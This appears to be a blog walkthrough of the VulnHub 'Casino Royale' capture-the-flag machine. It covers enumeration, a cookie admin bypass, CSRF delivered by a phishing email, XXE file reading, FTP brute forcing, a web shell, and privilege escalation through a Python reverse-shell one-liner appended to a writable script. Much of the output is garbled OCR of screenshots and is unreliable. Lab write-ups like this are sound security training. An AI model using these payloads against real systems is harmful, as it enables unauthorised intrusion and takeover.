Casino Royale CTF Walkthrough

Another James Bond themed CTF challenge from https://www.vulnhub.com/.

Spoilers ahead!

Scanning & Enumeration

Let’s start with a port scan of the target system:

starting "map 7.70 ( https://nmap.org ) at 2019-03-02 EST
Nmap scan report for casino- royale. locat (192.168.0.109)
Host is up (0.00ß74s latency)
Not shown: 996 closed ports
PORT
25/tcp
STATE SERVICE VERSION
open ftp
vsftpd 2.0.8 or later
Postfix smtpd
open smtp
I _smtp- commands: casino. local domain, PIPELINING,
I SSI •cert: Subject: commonName—casino
I subject Alternative Name: DNS: casino
I Not valid before:
l_Not valid after:
SIZE 10240eeø,
VRFY,
ETRN,
STARTTLS ,
ENHANCEDSTATUSCODES ,
8BITMIME ,
DSN ,
SMTPUTF8 ,
I _ SSI-date: TLS randomness does not represent time
86/ tcp
open http
Apache httpd 2.4.25 ( (Debian))
I http- robots. txt: 2 disallowed entries
l_/cards /kboard
l_http-server-header: Apache/2.4.25 (Debian)
I http-title: Site doesn't have a title (text/html).
8681/tcp open http
PHP cli server 5.5 or later
l_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: (vmware)
Device type: general purpose
Running: Linux 3. X14.X
OS CPE: kernel:3 cpe:/o: linux:
OS details: Linux 3.2
Network Distance: 1 hop

Nikto highlights some interesting directories to check out:

nikto -
- Nikto v2.1.6
• Target IP:
* Target Hostname:
Target port:
Start Time:
h 192.168.0.109
192.168.e 109
192. 168.0.109
2019-03-62 10:18:23 (GMT-5)
• Server: Apache/2.4.25 (Debian)
* Server leaks inodes via E Tags, header found With file / , fields: Oxdc Ox58272762faf27
+ The anti-clickjacking X-Frame-Options header is not present.
The x-xSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content Of the site in a different fashion to the MI
ME type
* Entry ' (cards/' in robots. txt returned a non- forbidden or redirect HTTP code (200)
+ Entry ' in robots . txt returned a non-forbidden or redirect HTTP code (200)
"robots . txt" contains 2 entries which should be manually viewed.
+ Multiple index files found: / index. html, / index.php
Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
/kboard/: KBoard Forum 0.3.0 and prior have a security problem in
forum_post.php and forum_reply .php
+ OSVDB•3092: 'cards/ : This might be interesting.
OSVDB-3e92: 'includes': This might be interesting...
+ OSVDB-3092: / install': This might be interesting...
• Uncommon header found, with contents:
* Uncommon header 'x-robots- tag' found, With contents: noindex, nofOIIOW
+ Uncommon header 'x-ob mode' found, with contents: I
OsvoB-3233: ,'icons/README: Apache default file found.
/phpmyadmin/: phpMyAdmin directory found
• 8348 requests: O error(s) and 18 item(s) reported on remote host
none
* End Time:
2019-03-02 (6MT-5) (29 seconds)

The /install directory shows PokerMax Pro Poker software (v0.13) is installed. From a quick Google, an exploit is available (https://www.exploit-db.com/exploits/6766), allowing you to login as an administrator account by adding a cookie.

PokerMax Pro Poker Leagc€ X +
@ 192.168.0.109
'install/
Most Visited Getting Started (GIF Image, 500 *200 (GIF Image, 600 x 269 @ PokerMaxPro Poker Le.„ phpMyAdmin
PokerMax poker League
01 March 2019
PokerMax Poker League Installation
DATABASE TABLE INSTALLATION
Please enswe you have created the database and edited the config. php file with the correct database
information before attempting to install
You are abcut to install PokerMax Pro Poker Software
version vo.13
at
Click to Start Installation
444

I used BurpSuite to add the cookie when making the request:

H VIP history WebSockets history
Request to http://192.168.o.109:go
Options
Forward
Drop
Headers Hex
GET 'pokeradmin/confiqure.php HTTP/I.I
Host; 192.
user-Agent: MoziLla/5.o (Xll; Linux xg6_6a; rv:60.o) Gecko/20100101 Firefox/60.o
Accept:
Accept Encoding: gzip, deflate
Connection: close
upgrade-Insecure -Requests: I
Cookie: ValidUserAdmin=admin

I was then redirected to the administrator panel without authentication 🙂

- Mozilla Firefox
PokerMax Poker League :
PokerMax Poker League The Poker League Solution
x PokerMax Poker League x +
@ 192.168.o.109/pokeradrnin\configure.php
MostVisited Getting Started (GIF Image, 500 *200 @ (GIF Image, 600 *269 @ PokerMaxPro Poker Le„. z' phpMyAdmin PokerMaxPoker Leagu,.,
PokerMax poker League
pokerMaX poker
Home
League Settings
Clear League Data
Create Poker Tournament
Manage Poker Tournament
Add / Update Scores
Assign Players to
Add New p I ayers
p laye-s
print Results
01 March 2019
PokerMax Poker League Configure Settings
you want to change the username password w"icn you use to login to this control panel, enter the new details in the belt'" and click Lqxlate button. You may
asked to back in, it yckj Lqxlate these detaile Make sure the correct have entered 'or the contact and league inrorrnation
Username admin
Password raise12million
PNer League Name Casino Royale
League Elite High-stakes Texas em located at the
Casino please use our
when accessing this Site:
Local •q
Contact,'Toumament Director Le
Contact Email NA
Back Database

Once logged in, I could see listings of existing players:

PokerMax Poker League z: Manage Poker Players
Player Name
Felix Leitet
James gond
Tomelli
Player Nictwne
Completed found.
Date Added
17 November 2018
17 Novemtpr 201S
17 r.bvember 2018
17 November 201B
17 Novemtpr 2018
17 November 2018
17 Novemtpr 201S
Edit Info
Edit Info
Edit Info
Edit Info
Edit Info
Edit Info
Edit Info

One user profile stood out, due to them having an email address attached:

pokerMax poker League Update Player Information
• Are Required FjeJds and need to titled in.
• Player Name
• Nic r Larne
Em AdtÉe•SS
Valenka
Valenka
valenka
projects on:
p layet p
are local Update
your hosts file!
Update Details
Delete Player (confirm in next step)

Cross Site Request Forgery Exploitation

As per the instructions in the user profile, I added in a hosts file entry for casino-royale.local to point to the VulnHub system, and go to the /vip-client-portolios directory. This shows a SnowFox CMS:

Snowfox CMS
About
Blog
My Account •
Sorted By:
US English
Publish Time (Latest to Oldes
21
Casino Royale Event!
We invite our byal customers to participate in a luxurious event at the Casino Royale in Montenegro! The name of the game is Texas Hold'emand it's high stakes. Bring all and bet
the farm!
High-Tech Gadgets
wry specific hard to find gadgets - thars what we have! A niche market we surpass all of our competitors n.

One post relates to contacting the CMS admin. From another Google, the SnowFox CMS application is vulnerable to Cross Site Request Forgery (https://www.exploit-db.com/exploits/35301).

New Clients - Please Read
If you've been referred and are interested in our •assistance", please send us an email,
Send an email to our CMS admin: valenka@casino-royale./ocaj
Make sure to reference a known custonEr or at least someone we know in the subject line, otherwise the email be deleted without being Boked at.
Valenka checks her email often as well as manages this site.
Include any links to relevant information such as references, services, referrals, etc.
Site is LIVE! Welcome!
Big thanks to the IT folks for making this! Deadlines where tight and the complaints about •secure code review' were plentiful, but with the help of upper management',ve pushed through
Total Records: 6 | Total Pages: 1 | | 10
Records per Page

Time to craft the CSRF exploit;

cat exploit. html
<form action=•http://casino-royale.local/vip-client-portfolios/?url=admln/accounts/create"
<input
einput
<input
einput
s:input
<input
einput
•:input
einput
<input
einput
c/bodp
e/html>
hidden"
type "
type "hidden"
type "
hidden"
type
•verifiedEmail"
name:
username" value=" page"
name— •
-newPassword"
name—
confirmpassword" / >
name: •
—"user Groups [l" value:" 33"
name—
memo •
name=
•status"
name=
formAction" value" submit"
name:
form"

Then send an email to the target account to persuade them to click:

telnet 192.168.0.109 25
Trying 192.168.0.
connected to 192. 168.0. 169.
Escape character is
220 Mait Server •
NO UNAUTHORIZED ACCESS ALLOWED Pts.
EHLO test
-casino. I domain
250
250-PIPELINING
250-SIZE 1ß24eeøo
250
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-881 TMIME
250
SMTPUTF8
MAIL FROM: james@bond.com
250 2.1.e 0k
RCPT TO: valenka
250 2.1.5 0k
data
354 End data with
subject: telix
http://192.168.ø. html
kthxbai
250 2.0.O ok:
queued as
F268625C6

With our new admin account enabled, I could now login to the CMS as an admin. Whilst reviewing the user profiles, I noticed another web address in the “le” profile:

snowfox CMS
About •
Username
password
Blog
My Account •
Admin •
us I
Confirm password
user Groups
Logins
Last Login p
Last Login Time
user Language
Memo
Administrators
Al Users
o
No Data
US English
I primarity deal with the numbers, along with our most
Elite customers with access to lultra•access•
view/main.php

XML External Entity Injection

Looking at the source code of this URL suggested that it might be vulnerable to XXE:

I put together an XXE exploit using BurpSuite, which revealed the “customer” parameter was vulnerable:

Request
params Headers Hex XML
GET / ultra-access-vaew/main.php HTTP/I.I
Host: casino- royale.local
User -Agent: Mozilla/5.O (XII; Linux x86_64; :60.01 Gecko/20100101
Firefox/60.o
Accept: text/html , .8
Accept -Language: , .5
Accept-encoding: gzip, deflate
Cookie: .7cbfb068e8f80e7ffOc7ab32bc88fa23;
sfc .a216723621461d4c1cbf576
b4gg717ef
Connection:
Upgrade• Insecure-Requests: I
Cache-control; max -age:O
content-Length: 2021
encoding:"
foo [ foo ANY
SYSTEM •file:///etc/passwd"
ecredss
<cus tome O customer>
Target:
Response
Headers Hex HTML Render
Dispatcher, ; /var/run/speech•dispatcher; 'bin/ false
Display
pulse: x: 110: 114: pulseAudio daemon :
/var/run/putse:/bin/false
:Avahi "DNS daemon .
• 'bin/ false
saned : x : 112: 118 : : /bin/false
server, , ,
valenka
: /bin/bash
postfix 114: 121 : : /var/spool/postfix : /bin/false
ftp:x:IIS:124:ftp daemon, , ,
</bodp
c! - -al 50 p15 update the password for the ftp acct once the front
end is finished. -since it's easy

Brute Forcing

Since the HTML comments in the previous webpage suggested the FTP user had a weak password, and we now know the username from the /etc/passwd file (ftpUserULTRA) this looked like a good brute force candidate.

medusa -u ftpUserULTRA -P /usr/share/wordlists/fasttrack.txt -M ftp -h 192.168.0.109 -t 10

Credentials: ftpUserULTRA/bankbank

I connected to the FTP server using the credentials gained through brute force. Looking in the FTP directory, there were files which were also accessible from the webserver, such as hello_world.pl:

http://casino-royale.local/ultra-access-view/hello_world.pl

dud “ идеш
х. их.јхмј.
х- ах -.јхд.ј
доојеаидед
зоарзл
та:€т
х- лх-јхдјр
sale1dwaI
Iz:61
х-их-јхдјр
It:€I
saunl)Jd
Iz:61
х- 4х-јхд.јр
) vsnA
It:61
х • лк. јхдјр
speo итоо
х - ах-јхдзр
диашпэоо
It:61
х-их-јхдјр
d0iHsa0
ТЕ:бТ
х - И к- јхдјр
qag
IEII
I6I
96ее
96av
960е
96ev
96ее
96ev
96ev
960е
гввт
аввт
еввт
аввт
аввт
гввт
говт
zeBI
еевт
аевт
говт
• 6unsv1 Азојэајур ап 5ашоэ
азэн esI

This made it fairly obvious the aim was to upload a shell. Since existing Perl code was in place, that looked like the best option.

I uploaded /usr/share/webshells/perl/perlcmd.cgi, and used that to execute a reverse netcat shell:

nc -Ivp 1234
listening on (any] 1234
uidz33(wm•'• data)
Mozilla Firefox
• casino.royale.local/ultrc x +
Executing: which netcat
fbinfnetcat

Privilege Escalation

After poking around for a bit, I could see some interesting files in the /opt/casino-royale directory.

total 48
d rwxrvx r •x
drwxr-xr-x 4
-rw-r--r-
-rwsr-sr-x
- rwxrwx r - x
-rwxr-x--
- rwxrwxr -
2 root
root
root
1 root
root
: / - royale$
19: 03
18:17
19:02
14:26
15:30
root
- data
root
root
root
4096
4096
46
79
174
8696
54
402
71
Feb
Jan
Feb
Feb
Feb
Feb
Feb
Feb
Feb
Feb
22
17
20
22
20
21
20
20
20
20
15.
• 22
14.
•54
21.
•48
16.
•56
15
•.21
casino- data- cot lection. py
closer2root. txt
cot lect . php
index. html
m16 detect test
php-web-start. sh
run. sh
user -data. log

The file casino-data-collection.py was owned by “le” but writable by my current user group (www-data).

I appended a reverse shell into the data collection file:

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.111',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(['/bin/sh','-i']);

www-data@casino:/opt/casino-royale$ echo "import socket, subprocess , os .AF_INET, socket. SOCK_STREAY) ; s. 192.168.0. Il I
' ,4444)) ,O); os.dup2(s. , ' •i' > casino-data-cottection.py
• ' -i' casino-data-collection.py
www-data@casino:/opt/casino• royale$ python casino-data-collection.py
python casino-data-collection. py

By calling the file in the webroot, I got another reverse shell as the “le” user:

C:\Users\user.BORDERGATE\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image020.png

As per the previous directory listing, “le” was able to write to run.sh, which in turn was invoked from ./mi6_detect_test. The file already contained shell commands, so I added in /bin/sh. This provided a root shell.

C:\Users\user.BORDERGATE\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image021.png

Looking in the /root/flag directory, a flag script was found. Executing this started another web server …

Scanning & Enumeration

Cross Site Request Forgery Exploitation

XML External Entity Injection

Brute Forcing

Privilege Escalation

Related Posts

Dynamic DNS

Alternative C2 Agents

Android Penetration Testing

Android Certificate Pinning